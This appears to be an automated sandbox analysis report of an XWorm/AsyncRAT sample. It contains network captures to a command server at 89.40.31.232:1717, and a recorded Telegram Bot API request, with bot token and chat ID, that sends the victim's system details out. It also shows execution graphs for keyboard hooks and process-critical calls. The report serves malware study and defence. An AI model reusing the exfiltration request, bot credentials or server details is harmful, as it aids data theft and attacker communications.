                                              Nov 25, 2024 15:40:04.086639881 CET17174998089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:04.401469946 CET499801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:04.522717953 CET17174998089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:07.588083029 CET499801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:07.708159924 CET17174998089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:07.708226919 CET499801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:07.828404903 CET17174998089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:08.631838083 CET17174998089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:08.632061005 CET499801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:12.712879896 CET499801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:12.715475082 CET499811717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:12.832847118 CET17174998089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:12.835486889 CET17174998189.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:12.837574005 CET499811717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:12.857445002 CET499811717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:12.980072021 CET17174998189.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:12.980123043 CET499811717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:13.100358009 CET17174998189.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:13.681837082 CET499811717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:13.802973032 CET17174998189.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:14.275604963 CET499811717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:14.397484064 CET17174998189.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:22.994384050 CET499811717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:23.114423037 CET17174998189.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:23.114528894 CET499811717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:23.234499931 CET17174998189.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:28.119507074 CET499811717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:28.239586115 CET17174998189.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:28.261459112 CET499811717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:28.382009029 CET17174998189.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:33.385014057 CET499811717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:33.507261992 CET17174998189.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:33.507339001 CET499811717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:33.632354975 CET17174998189.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:34.773480892 CET17174998189.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:34.776855946 CET499811717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:38.463629961 CET499811717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:38.470063925 CET499821717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:38.583731890 CET17174998189.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:38.591054916 CET17174998289.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:38.593724966 CET499821717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:38.609653950 CET499821717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:38.731389046 CET17174998289.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:39.103781939 CET499821717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:39.224001884 CET17174998289.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:39.224112034 CET499821717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:39.344186068 CET17174998289.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:39.344257116 CET499821717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:39.551934958 CET17174998289.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:40.072809935 CET499821717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:40.193963051 CET17174998289.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:43.558659077 CET499821717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:43.678657055 CET17174998289.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:44.385030031 CET499821717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:44.506850958 CET17174998289.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:44.900706053 CET499821717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:45.020997047 CET17174998289.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:46.028031111 CET499821717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:46.148463011 CET17174998289.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:58.354068995 CET499821717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:40:58.507229090 CET17174998289.40.31.232192.168.2.10
                                              Nov 25, 2024 15:41:00.586488962 CET17174998289.40.31.232192.168.2.10
                                              Nov 25, 2024 15:41:00.586611032 CET499821717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:41:01.962985992 CET499821717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:41:01.967700958 CET499831717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:41:02.096287012 CET17174998289.40.31.232192.168.2.10
                                              Nov 25, 2024 15:41:02.096323013 CET17174998389.40.31.232192.168.2.10
                                              Nov 25, 2024 15:41:02.096525908 CET499831717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:41:02.109853983 CET499831717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:41:02.229769945 CET17174998389.40.31.232192.168.2.10
                                              Nov 25, 2024 15:41:12.400649071 CET499831717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:41:12.558398008 CET17174998389.40.31.232192.168.2.10
                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 25, 2024 15:36:44.857116938 CET5290653192.168.2.101.1.1.1
                                              Nov 25, 2024 15:36:45.003609896 CET53529061.1.1.1192.168.2.10
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Nov 25, 2024 15:36:44.857116938 CET192.168.2.101.1.1.10x190aStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Nov 25, 2024 15:36:45.003609896 CET1.1.1.1192.168.2.100x190aNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                              • api.telegram.org
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.1049708149.154.167.2204437760C:\Users\user\Desktop\Mzo6BdEtGv.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-25 14:36:46 UTC443OUTGET /bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AFE6865D607A29FAFDCBE%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20GCCE9LGK%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024 HTTP/1.1
                                              Host: api.telegram.org
                                              Connection: Keep-Alive
                                              2024-11-25 14:36:47 UTC388INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Mon, 25 Nov 2024 14:36:47 GMT
                                              Content-Type: application/json
                                              Content-Length: 441
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-11-25 14:36:47 UTC441INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 36 33 30 38 39 34 31 38 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 74 65 76 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 74 65 76 65 62 6f 74 32 78 32 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 39 33 30 32 38 37 35 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 61 74 68 75 64 64 6c 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 68 75 64 64 6c 65 6d 61 6e 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 35 34 35 34 30 37 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 32 30 20 5b 58 57
                                              Data Ascii: {"ok":true,"result":{"message_id":12544,"from":{"id":5630894183,"is_bot":true,"first_name":"steve","username":"stevebot2x2bot"},"chat":{"id":793028759,"first_name":"sathuddle","username":"huddleman01","type":"private"},"date":1732545407,"text":"\u2620 [XW


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Target ID:1
                                              Start time:09:36:38
                                              Start date:25/11/2024
                                              Path:C:\Users\user\Desktop\Mzo6BdEtGv.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\Mzo6BdEtGv.exe"
                                              Imagebase:0xe0000
                                              File size:76'800 bytes
                                              MD5 hash:068C99328320CAAA7C5F2D31B0FF214B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000000.1284426259.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000000.1284426259.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                              Reputation:low
                                              Has exited:false

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:22%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:12
                                                Total number of Limit Nodes:0
                                                execution_graph 4478 7ff7c14b1bc2 4479 7ff7c14b28c0 SetWindowsHookExW 4478->4479 4481 7ff7c14b2971 4479->4481 4462 7ff7c14b269d 4463 7ff7c14b26ce 4462->4463 4466 7ff7c14b1bb0 4463->4466 4465 7ff7c14b26eb 4467 7ff7c14b1bc2 SetWindowsHookExW 4466->4467 4469 7ff7c14b2971 4467->4469 4469->4465 4470 7ff7c14b251d 4471 7ff7c14b2580 RtlSetProcessIsCritical 4470->4471 4473 7ff7c14b2602 4471->4473

                                                Control-flow Graph

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.3747427151.00007FF7C14B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ff7c14b0000_Mzo6BdEtGv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5d729b5a17e29f63bce205cee186a6b89e8345e596f38dfe053a4f8881a5483d
                                                • Instruction ID: 9ca4b41d3e5577de31e08792a76e5537f8335c7d2777fa93a3c1aff160676647
                                                • Opcode Fuzzy Hash: 5d729b5a17e29f63bce205cee186a6b89e8345e596f38dfe053a4f8881a5483d
                                                • Instruction Fuzzy Hash: E2F11822F18D1A4BEB44FB7CA8591FCB7E1EF4537678406B9D44EC7283ED28A5028394

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 585 7ff7c14b8af2-7ff7c14b8aff 586 7ff7c14b8b01-7ff7c14b8b09 585->586 587 7ff7c14b8b0a-7ff7c14b8bd7 585->587 586->587 590 7ff7c14b8c43 587->590 591 7ff7c14b8bd9-7ff7c14b8be2 587->591 593 7ff7c14b8c45-7ff7c14b8c6a 590->593 591->590 592 7ff7c14b8be4-7ff7c14b8bf0 591->592 594 7ff7c14b8bf2-7ff7c14b8c04 592->594 595 7ff7c14b8c29-7ff7c14b8c41 592->595 600 7ff7c14b8cd6 593->600 601 7ff7c14b8c6c-7ff7c14b8c75 593->601 596 7ff7c14b8c06 594->596 597 7ff7c14b8c08-7ff7c14b8c1b 594->597 595->593 596->597 597->597 599 7ff7c14b8c1d-7ff7c14b8c25 597->599 599->595 602 7ff7c14b8cd8-7ff7c14b8cfd 600->602 601->600 603 7ff7c14b8c77-7ff7c14b8c83 601->603 610 7ff7c14b8cff-7ff7c14b8d09 602->610 611 7ff7c14b8d6b 602->611 604 7ff7c14b8c85-7ff7c14b8c97 603->604 605 7ff7c14b8cbc-7ff7c14b8cd4 603->605 607 7ff7c14b8c99 604->607 608 7ff7c14b8c9b-7ff7c14b8cae 604->608 605->602 607->608 608->608 609 7ff7c14b8cb0-7ff7c14b8cb8 608->609 609->605 610->611 612 7ff7c14b8d0b-7ff7c14b8d18 610->612 613 7ff7c14b8d6d-7ff7c14b8d9b 611->613 614 7ff7c14b8d51-7ff7c14b8d69 612->614 615 7ff7c14b8d1a-7ff7c14b8d2c 612->615 619 7ff7c14b8d9d-7ff7c14b8da8 613->619 620 7ff7c14b8e0b 613->620 614->613 617 7ff7c14b8d30-7ff7c14b8d43 615->617 618 7ff7c14b8d2e 615->618 617->617 621 7ff7c14b8d45-7ff7c14b8d4d 617->621 618->617 619->620 622 7ff7c14b8daa-7ff7c14b8db8 619->622 623 7ff7c14b8e0d-7ff7c14b8ee5 620->623 621->614 624 7ff7c14b8df1-7ff7c14b8e09 622->624 625 7ff7c14b8dba-7ff7c14b8dcc 622->625 633 7ff7c14b8eeb-7ff7c14b8efa 623->633 624->623 626 7ff7c14b8dd0-7ff7c14b8de3 625->626 627 7ff7c14b8dce 625->627 626->626 629 7ff7c14b8de5-7ff7c14b8ded 626->629 627->626 629->624 634 7ff7c14b8f02-7ff7c14b8f64 call 7ff7c14b8f80 633->634 635 7ff7c14b8efc 633->635 642 7ff7c14b8f66 634->642 643 7ff7c14b8f6b-7ff7c14b8f7f 634->643 635->634 642->643
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.3747427151.00007FF7C14B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ff7c14b0000_Mzo6BdEtGv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ed9e38683a8ac17de0dc6342d3e1a25bc098b6f0d10a46784b3e003f2e363cc5
                                                • Instruction ID: a5d5f561224e3ec7dc904c24a6bac0e838ebcdcb1060e4def70a4127622f70da
                                                • Opcode Fuzzy Hash: ed9e38683a8ac17de0dc6342d3e1a25bc098b6f0d10a46784b3e003f2e363cc5
                                                • Instruction Fuzzy Hash: 3EE1B230908E8E8FEBA8EF28C8557E977E1FF54310F44427ED84DC7291CA78A9518B81

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 644 7ff7c14b7d76-7ff7c14b7e27 647 7ff7c14b7e93 644->647 648 7ff7c14b7e29-7ff7c14b7e32 644->648 650 7ff7c14b7e95-7ff7c14b7eba 647->650 648->647 649 7ff7c14b7e34-7ff7c14b7e40 648->649 651 7ff7c14b7e42-7ff7c14b7e54 649->651 652 7ff7c14b7e79-7ff7c14b7e91 649->652 657 7ff7c14b7f26 650->657 658 7ff7c14b7ebc-7ff7c14b7ec5 650->658 653 7ff7c14b7e56 651->653 654 7ff7c14b7e58-7ff7c14b7e6b 651->654 652->650 653->654 654->654 656 7ff7c14b7e6d-7ff7c14b7e75 654->656 656->652 659 7ff7c14b7f28-7ff7c14b7fd0 657->659 658->657 660 7ff7c14b7ec7-7ff7c14b7ed3 658->660 671 7ff7c14b7fd2-7ff7c14b7fdc 659->671 672 7ff7c14b803e 659->672 661 7ff7c14b7ed5-7ff7c14b7ee7 660->661 662 7ff7c14b7f0c-7ff7c14b7f24 660->662 663 7ff7c14b7ee9 661->663 664 7ff7c14b7eeb-7ff7c14b7efe 661->664 662->659 663->664 664->664 666 7ff7c14b7f00-7ff7c14b7f08 664->666 666->662 671->672 673 7ff7c14b7fde-7ff7c14b7feb 671->673 674 7ff7c14b8040-7ff7c14b8069 672->674 675 7ff7c14b8024-7ff7c14b803c 673->675 676 7ff7c14b7fed-7ff7c14b7fff 673->676 681 7ff7c14b80d3 674->681 682 7ff7c14b806b-7ff7c14b8076 674->682 675->674 677 7ff7c14b8001 676->677 678 7ff7c14b8003-7ff7c14b8016 676->678 677->678 678->678 680 7ff7c14b8018-7ff7c14b8020 678->680 680->675 683 7ff7c14b80d5-7ff7c14b8166 681->683 682->681 684 7ff7c14b8078-7ff7c14b8086 682->684 692 7ff7c14b816c-7ff7c14b817b 683->692 685 7ff7c14b80bf-7ff7c14b80d1 684->685 686 7ff7c14b8088-7ff7c14b809a 684->686 685->683 688 7ff7c14b809e-7ff7c14b80b1 686->688 689 7ff7c14b809c 686->689 688->688 690 7ff7c14b80b3-7ff7c14b80bb 688->690 689->688 690->685 693 7ff7c14b8183-7ff7c14b81e8 call 7ff7c14b8204 692->693 694 7ff7c14b817d 692->694 701 7ff7c14b81ef-7ff7c14b8203 693->701 702 7ff7c14b81ea 693->702 694->693 702->701
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.3747427151.00007FF7C14B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ff7c14b0000_Mzo6BdEtGv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fad730ac315c661721ae9b0ed0a66fdbeb415643fb5de7b4ec161cfc263fa335
                                                • Instruction ID: 5b91325b6ac62ec25bd63e9ef524b52889403103c9d0a84b22c40330ea8b0a66
                                                • Opcode Fuzzy Hash: fad730ac315c661721ae9b0ed0a66fdbeb415643fb5de7b4ec161cfc263fa335
                                                • Instruction Fuzzy Hash: 0BE18030908E4E8FEBA8EF28C8557E977E1FF54311F44427AE84EC7291DB74A9458B81

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 94 7ff7c14b251d-7ff7c14b2600 RtlSetProcessIsCritical 97 7ff7c14b2602 94->97 98 7ff7c14b2608-7ff7c14b263d 94->98 97->98
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.3747427151.00007FF7C14B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ff7c14b0000_Mzo6BdEtGv.jbxd
                                                Similarity
                                                • API ID: CriticalProcess
                                                • String ID:
                                                • API String ID: 2695349919-0
                                                • Opcode ID: a32c980c51e98ca9399e830060ffe6a135a43da76c3be725fe62450dc4d2b16a
                                                • Instruction ID: 7bbff8a112a2040ea334489eeb26a2458a6b29f70b5ccb62e16d17f94c4df1dd
                                                • Opcode Fuzzy Hash: a32c980c51e98ca9399e830060ffe6a135a43da76c3be725fe62450dc4d2b16a
                                                • Instruction Fuzzy Hash: 3F41E53180C6588FD719DFA8D845BE9BBF4FF56311F04416EE08AC3692DB746846CB91

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 100 7ff7c14b2898-7ff7c14b289f 101 7ff7c14b28a1-7ff7c14b28a9 100->101 102 7ff7c14b28aa-7ff7c14b291d 100->102 101->102 106 7ff7c14b2923-7ff7c14b2930 102->106 107 7ff7c14b29a9-7ff7c14b29ad 102->107 108 7ff7c14b2932-7ff7c14b296f SetWindowsHookExW 106->108 107->108 110 7ff7c14b2971 108->110 111 7ff7c14b2977-7ff7c14b29a8 108->111 110->111
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.3747427151.00007FF7C14B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ff7c14b0000_Mzo6BdEtGv.jbxd
                                                Similarity
                                                • API ID: HookWindows
                                                • String ID:
                                                • API String ID: 2559412058-0
                                                • Opcode ID: 486dbb896c57c85802d941dd84ffff1ac19d939c2136af1afc4fae9fbcb594c4
                                                • Instruction ID: d7d41ba133ff35a68247e1b0c070864721be1927705f53a70b9dc25c56de5d36
                                                • Opcode Fuzzy Hash: 486dbb896c57c85802d941dd84ffff1ac19d939c2136af1afc4fae9fbcb594c4
                                                • Instruction Fuzzy Hash: 7831D931A1CE5D4FDB18EB6C984A6F9BBE1EF55321F00427ED04DC3292CE6578128791

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 114 7ff7c14b1bb0-7ff7c14b291d 119 7ff7c14b2923-7ff7c14b2930 114->119 120 7ff7c14b29a9-7ff7c14b29ad 114->120 121 7ff7c14b2932-7ff7c14b296f SetWindowsHookExW 119->121 120->121 123 7ff7c14b2971 121->123 124 7ff7c14b2977-7ff7c14b29a8 121->124 123->124
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.3747427151.00007FF7C14B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ff7c14b0000_Mzo6BdEtGv.jbxd
                                                Similarity
                                                • API ID: HookWindows
                                                • String ID:
                                                • API String ID: 2559412058-0
                                                • Opcode ID: 855aff465266fc211922f8ea5dee234955891f15e85eb95024596d1fa8a248b9
                                                • Instruction ID: 4fbc8d9ba946f05f51590d155dc6ecae27a5ea2cf039d30085444cb48028f293
                                                • Opcode Fuzzy Hash: 855aff465266fc211922f8ea5dee234955891f15e85eb95024596d1fa8a248b9
                                                • Instruction Fuzzy Hash: B231D530A1CE5C9FDB18EF5898056B9BBE1FB99321F10427ED04ED3292CA74B8168781

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 127 7ff7c14b1bc2-7ff7c14b291d 131 7ff7c14b2923-7ff7c14b2930 127->131 132 7ff7c14b29a9-7ff7c14b29ad 127->132 133 7ff7c14b2932-7ff7c14b296f SetWindowsHookExW 131->133 132->133 135 7ff7c14b2971 133->135 136 7ff7c14b2977-7ff7c14b29a8 133->136 135->136
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.3747427151.00007FF7C14B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ff7c14b0000_Mzo6BdEtGv.jbxd
                                                Similarity
                                                • API ID: HookWindows
                                                • String ID:
                                                • API String ID: 2559412058-0
                                                • Opcode ID: 4232ad02f410688744c1bab48752543bb84fa1d1cadc78cefbf99c71518fcd14
                                                • Instruction ID: a8c54c405c88584c29215126a4471c96b9d6aaf01093f51be7db0bfdb871d342
                                                • Opcode Fuzzy Hash: 4232ad02f410688744c1bab48752543bb84fa1d1cadc78cefbf99c71518fcd14
                                                • Instruction Fuzzy Hash: 7331C530A1CE1D9FDB18EF5898456F9B7E1EBA9321F10423ED04ED3291CA74B81287C1